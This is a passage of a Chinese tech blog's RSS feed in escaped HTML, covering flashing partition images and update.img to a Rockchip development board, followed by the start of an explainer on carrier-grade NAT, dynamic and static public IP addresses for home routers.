79, 79); line-height: 28px; font-synthesis-style: auto; overflow-wrap: break-word; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;配置&lt;/h3&gt;&lt;p style=&quot;box-sizing: border-box; outline: 0px; margin-top: 0px; margin-bottom: 16px; padding: 0px; font-size: 16px; color: rgb(77, 77, 77); line-height: 26px; overflow: auto hidden; font-synthesis-style: auto; overflow-wrap: break-word; font-family: -apple-system, &amp;quot;SF UI Text&amp;quot;, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;通过上小节分析可知，parameter.txt文件中一共&lt;span style=&quot;box-sizing: border-box; outline: 0px; font-weight: 700; font-synthesis-style: auto; overflow-wrap: break-word;&quot;&gt;定义了8个分区&lt;/span&gt;，提供了每个分区的名字起始地址以及分区大小，接下来需要&lt;span style=&quot;box-sizing: border-box; outline: 0px; font-weight: 700; font-synthesis-style: auto; overflow-wrap: break-word;&quot;&gt;手动配置&lt;/span&gt;瑞芯微开发工具，配置完之后如下图所示：&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;&lt;/span&gt;&lt;img data-width=&quot;981&quot; data-height=&quot;462&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/08/202508171755405560350005.png&quot; alt=&quot;image.png&quot;/&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;这里需要注意几个点：&lt;/span&gt;&lt;/p&gt;&lt;ol class=&quot; list-paddingleft-2&quot; style=&quot;list-style-type: decimal;&quot;&gt;&lt;li&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;瑞芯微开发工具中地址数值的单位也是sectors(扇区,-一个扇区等于512字节)；&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;第一项对应的是MiniLoaderAll.bin镜像，它的烧录地址不用配置，直接使用0x0即可。因为MiniLoaderAll.bin镜像有专门的烧录地址，无需用户配置，而且它的名字一般都是Loader(或小写loader)，不要去改动它；&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;上图中第二项对应的是分区表parameter.txt，同样它的地址也不下用配置，直接使用0x0即可，因为parameter.txt文件不会烧录到Flash中，但会读取该文件定义的分区、去初始化Flash物理分区；同样，它的名字为parameter(或者大写Parameter)，不要去改动它，因为底层需要通过这个&amp;quot;parameter&amp;quot;名字来识别分区表文件。&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;除了MiniLoaderAllbin和parameter.txt稍微特殊一点之外，其它镜像直接根据parameter.txt分区表定义的起始地址进行配置即可，名字尽量使用parameter.txt文件中所定义的分区名。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;&lt;img data-width=&quot;996&quot; data-height=&quot;502&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/08/202508171755405683232546.png&quot; alt=&quot;image.png&quot;/&gt;&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #4D4D4D; font-family: -apple-system, &amp;quot;SF UI Text&amp;quot;, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: 16px; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: #FFFFFF;&quot;&gt;将配置信息导出、保存到config.cfg文件中，方便下次导入该配置信息。&lt;/span&gt;&lt;/p&gt;&lt;h3 style=&quot;box-sizing: border-box; outline: 0px; margin: 24px 0px 8px; padding: 0px; font-family: &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, SimHei, Arial, SimSun; font-size: 18px; color: rgb(79, 79, 79); line-height: 28px; font-synthesis-style: auto; overflow-wrap: break-word; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;烧录&lt;/h3&gt;&lt;p style=&quot;box-sizing: border-box; outline: 0px; margin-top: 0px; margin-bottom: 16px; padding: 0px; font-size: 16px; color: rgb(77, 77, 77); line-height: 26px; overflow: auto hidden; font-synthesis-style: auto; overflow-wrap: break-word; font-family: -apple-system, &amp;quot;SF UI Text&amp;quot;, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;如下图所示：&lt;/p&gt;&lt;p&gt;&lt;img data-width=&quot;969&quot; data-height=&quot;457&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/08/202508171755405797638941.png&quot; alt=&quot;image.png&quot;/&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #4D4D4D; font-family: -apple-system, &amp;quot;SF UI Text&amp;quot;, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: 16px; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: #FFFFFF;&quot;&gt;执行过程中，右侧空白处会输出log信息，如下图：&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #4D4D4D; font-family: -apple-system, &amp;quot;SF UI Text&amp;quot;, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: 16px; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: #FFFFFF;&quot;&gt;&lt;img data-width=&quot;974&quot; data-height=&quot;461&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/08/202508171755405821420080.png&quot; alt=&quot;image.png&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #4D4D4D; font-family: -apple-system, &amp;quot;SF UI Text&amp;quot;, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: 16px; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: #FFFFFF;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; outline: 0px; margin-top: 0px; margin-bottom: 16px; padding: 0px; font-size: 16px; color: rgb(77, 77, 77); line-height: 26px; overflow: auto hidden; font-synthesis-style: auto; overflow-wrap: break-word; font-family: -apple-system, &amp;quot;SF UI Text&amp;quot;, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;也可以只烧录特定镜像，只勾选对应的这一项即可。&lt;/p&gt;&lt;h3 style=&quot;box-sizing: border-box; outline: 0px; margin: 24px 0px 8px; padding: 0px; font-family: &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, SimHei, Arial, SimSun; font-size: 18px; color: rgb(79, 79, 79); line-height: 28px; font-synthesis-style: auto; overflow-wrap: break-word; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;启动系统&lt;/h3&gt;&lt;p style=&quot;box-sizing: border-box; outline: 0px; margin-top: 0px; margin-bottom: 16px; padding: 0px; font-size: 16px; color: rgb(77, 77, 77); line-height: 26px; overflow: auto hidden; font-synthesis-style: auto; overflow-wrap: break-word; font-family: -apple-system, &amp;quot;SF UI Text&amp;quot;, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;烧录完成后会自动重启开发板，进入&lt;span class=&quot;words-blog hl-git-1&quot; data-tit=&quot;Linux&quot; data-pretit=&quot;linux&quot; style=&quot;box-sizing: border-box; outline: 0px; margin: 0px 3px 0px 0px; padding: 0px 18px 0px 0px; font-synthesis-style: auto; overflow-wrap: break-word; cursor: pointer; background: url(&amp;quot;../img/gitcode-key.png&amp;quot;) right center / 14px 14px no-repeat transparent; box-shadow: none; color: #4EA1DB !important;&quot;&gt;Linux&lt;/span&gt;&amp;nbsp;buildroot系统，串口终端（波特率15M）会输出信息：&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #4D4D4D; font-family: -apple-system, &amp;quot;SF UI Text&amp;quot;, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: 16px; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: #FFFFFF;&quot;&gt;&lt;img data-width=&quot;916&quot; data-height=&quot;692&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/08/202508171755405957463152.png&quot; alt=&quot;image.png&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #4D4D4D; font-family: -apple-system, &amp;quot;SF UI Text&amp;quot;, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: 16px; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: #FFFFFF;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;h3 style=&quot;box-sizing: border-box; outline: 0px; margin: 24px 0px 8px; padding: 0px; font-family: &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, SimHei, Arial, SimSun; font-size: 18px; color: rgb(79, 79, 79); line-height: 28px; font-synthesis-style: auto; overflow-wrap: break-word; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;烧录update.img&lt;/h3&gt;&lt;p style=&quot;box-sizing: border-box; outline: 0px; margin-top: 0px; margin-bottom: 16px; padding: 0px; font-size: 16px; color: rgb(77, 77, 77); line-height: 26px; overflow: auto hidden; font-synthesis-style: auto; overflow-wrap: break-word; font-family: -apple-system, &amp;quot;SF UI Text&amp;quot;, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;我没有烧录这个的时候，就会在上图卡住。&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; outline: 0px; margin-top: 0px; margin-bottom: 16px; padding: 0px; font-size: 16px; color: rgb(77, 77, 77); line-height: 26px; overflow: auto hidden; font-synthesis-style: auto; overflow-wrap: break-word; font-family: -apple-system, &amp;quot;SF UI Text&amp;quot;, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;进入开发工具：&lt;/p&gt;&lt;p&gt;&lt;img data-width=&quot;971&quot; data-height=&quot;461&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/08/202508171755405483299605.png&quot; alt=&quot;image.png&quot;/&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; outline: 0px; margin-top: 0px; margin-bottom: 16px; padding: 0px; font-size: 16px; color: rgb(77, 77, 77); line-height: 26px; overflow: auto hidden; font-synthesis-style: auto; overflow-wrap: break-word; font-family: -apple-system, &amp;quot;SF UI Text&amp;quot;, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;选择了对应的update.img之后，点击“升级”就会进入烧录。&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; outline: 0px; margin-top: 0px; margin-bottom: 16px; padding: 0px; font-size: 16px; color: rgb(77, 77, 77); line-height: 26px; overflow: auto hidden; font-synthesis-style: auto; overflow-wrap: break-word; font-family: -apple-system, &amp;quot;SF UI Text&amp;quot;, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-variant-ligatures: no-common-ligatures; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;之后就能够正常开机了。&lt;/p&gt;&lt;p&gt;Ubuntu的方法就是命令行模式了 本文暂时不写，有需要的话网上教程也很多。&lt;br/&gt;&lt;/p&gt;</description><pubDate>Sun, 17 Aug 2025 12:26:23 +0800</pubDate></item><item><title>路由器获取是大内网IP地址？有的人是获取到公网动态IP地址？又有人是静态公网IP地址？到底都是什么意思？</title><link>https://www.qxhut.cn/?id=48</link><description>&lt;div class=&quot;rich_media_content js_underline_content
                       autoTypeSetting24psection
            &quot; id=&quot;js_content&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; color: rgba(0, 0, 0, 0.9); font-size: 17px; overflow: hidden; text-align: justify; position: relative; z-index: 0; user-select: text; font-family: &amp;quot;PingFang SC&amp;quot;, system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; letter-spacing: 0.544px; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;section style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px 0px 8px; padding: 0px; outline: 0px; max-width: 100%; letter-spacing: 0.544px; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; letter-spacing: 0.544px; text-align: left; text-indent: 0em; visibility: visible; font-size: 14px; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;strong style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; font-size: 16px; letter-spacing: 0.578px; text-indent: 34px; visibility: visible;&quot;&gt;&lt;strong style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; letter-spacing: 0.578px; color: rgb(255, 76, 65); caret-color: rgba(0, 0, 0, 0); visibility: visible;&quot;&gt;&lt;span style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px; letter-spacing: 0.578px; color: #920D80; visibility: visible;&quot;&gt;需求描述&lt;/span&gt;&lt;/strong&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/section&gt;&lt;section style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px 0px 8px; padding: 0px; outline: 0px; max-width: 100%; letter-spacing: 0.544px; text-indent: 2em; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px; visibility: visible;&quot;&gt;兄弟们，最近有些小白兄弟会问这样一个问题？&lt;/span&gt;&lt;/span&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px; visibility: visible;&quot;&gt;听别人说，自己路由器获取是大内网IP地址？有的人是获取到动态&lt;/span&gt;&lt;/span&gt;&lt;span leaf=&quot;&quot; data-pm-slice=&quot;1 1 [&amp;quot;para&amp;quot;,{&amp;quot;tagName&amp;quot;:&amp;quot;section&amp;quot;,&amp;quot;attributes&amp;quot;:{&amp;quot;style&amp;quot;:&amp;quot;-webkit-tap-highlight-color: transparent;margin: 0px 0px 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgba(0, 0, 0, 0.9);font-family: \&amp;quot;PingFang SC\&amp;quot;, system-ui, -apple-system, BlinkMacSystemFont, \&amp;quot;Helvetica Neue\&amp;quot;, \&amp;quot;Hiragino Sans GB\&amp;quot;, \&amp;quot;Microsoft YaHei UI\&amp;quot;, \&amp;quot;Microsoft YaHei\&amp;quot;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-color: rgb(255, 255, 255);text-indent: 2em;line-height: 2em;visibility: visible;&amp;quot;},&amp;quot;namespaceURI&amp;quot;:&amp;quot;http://www.w3.org/1999/xhtml&amp;quot;}]&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px; visibility: visible;&quot;&gt;公网IP地址？又有人是静态公网IP地址？到底都是什么意思？那今天我们就来看一下，这些说法到底都是什么意思？&lt;/span&gt;&lt;/span&gt;&lt;/section&gt;&lt;section data-pm-slice=&quot;0 0 []&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px 0px 8px; padding: 0px; outline: 0px; max-width: 100%; letter-spacing: 0.544px; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; letter-spacing: 0.544px; color: #000000; font-size: 14px; text-align: left; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;strong style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; letter-spacing: 0.544px; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; color: rgb(103, 103, 103); text-indent: 34px; visibility: visible;&quot;&gt;&lt;span style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: #333333; font-family: arial, &amp;quot;pingfang sc&amp;quot;, stheiti, &amp;quot;microsoft yahei&amp;quot;, sans-serif; letter-spacing: normal; white-space-collapse: preserve; visibility: visible;&quot;&gt;&lt;strong style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-family: system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; letter-spacing: 0.544px; color: rgb(62, 62, 62); visibility: visible;&quot;&gt;&lt;strong style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; letter-spacing: 0.578px; visibility: visible;&quot;&gt;&lt;span style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: #EE4006; letter-spacing: 0.544px; visibility: visible;&quot;&gt;&lt;strong style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; letter-spacing: 0.578px; visibility: visible;&quot;&gt;&lt;span style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; letter-spacing: 0.51px; visibility: visible;&quot;&gt;&lt;strong style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-family: &amp;quot;PingFang SC&amp;quot;, system-ui, -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; letter-spacing: 0.544px; visibility: visible;&quot;&gt;解决过程&lt;/strong&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/section&gt;&lt;section style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px 0px 8px; padding: 0px; outline: 0px; max-width: 100%; letter-spacing: 0.544px; text-indent: 2em; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px; visibility: visible;&quot;&gt;那首先要了解一个上网概念，如果我们家里，或者公司，所有电脑手机要上网，是不能直接就去上网的，想要上网怎么办呢？是不是要去运营商办理宽带，那办理了宽带，办理了宽带后，运营商就上门给你们家或者公司拉了一根光纤线和一个光猫，就可以上网了。&lt;/span&gt;&lt;/span&gt;&lt;/section&gt;&lt;section style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px 0px 8px; padding: 0px; outline: 0px; max-width: 100%; letter-spacing: 0.544px; text-indent: 2em; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px; visibility: visible;&quot;&gt;为什么能上网呢？难道就是因为有光猫和光纤吗？其实最主要的功能是，你向运营商付费之后，运营商就会给你一个公网IP地址，这个公网IP地址，可以让你家里或公司的所有设备都可以去上互联网。其实你的向运营商付费，就是向运营商买了一个公网IP地址，但是运营商也没有和我说，他给我一个公网地址，只是问我要开通多少兆带宽，是300兆还是500兆，还是1000兆？&lt;/span&gt;&lt;/span&gt;&lt;/section&gt;&lt;section style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px 0px 8px; padding: 0px; outline: 0px; max-width: 100%; letter-spacing: 0.544px; text-indent: 2em; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px; visibility: visible;&quot;&gt;为什么说，我向运营商买了一个公网IP地址，运营商也没有给我公网IP地址，但是我还是可以上网呢？老是听有的人说，自己家里获取的是大内网IP地址，有的人是获取到公网IP地址，还有的人配置的静态公网IP地址？&lt;/span&gt;&lt;/span&gt;&lt;/section&gt;&lt;section style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px 0px 8px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; text-indent: 2em; line-height: 2em; visibility: visible;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px; color: #FF4C41; font-weight: bold; visibility: visible;&quot;&gt;一、首先我们来看一下，什么叫大内网Ip地址？&lt;/span&gt;&lt;/span&gt;&lt;/section&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px 0px 8px; padding: 0px; outline: 0px; max-width: 100%; letter-spacing: 0.544px; text-indent: 2em; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px; visibility: visible;&quot;&gt;你登录到你们家的路由器，查看WAN口获取的Ip地址，如果PPPOE拨号，获取的是100/10开头的ip地址，那就说明你们家路由器获取的是大内网地址。&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px 0px 8px; padding: 0px; outline: 0px; max-width: 100%; letter-spacing: 0.544px; text-indent: 2em; line-height: 2em; visibility: visible; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; visibility: visible;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px; visibility: visible;&quot;&gt;&lt;img data-width=&quot;582&quot; data-height=&quot;386&quot; 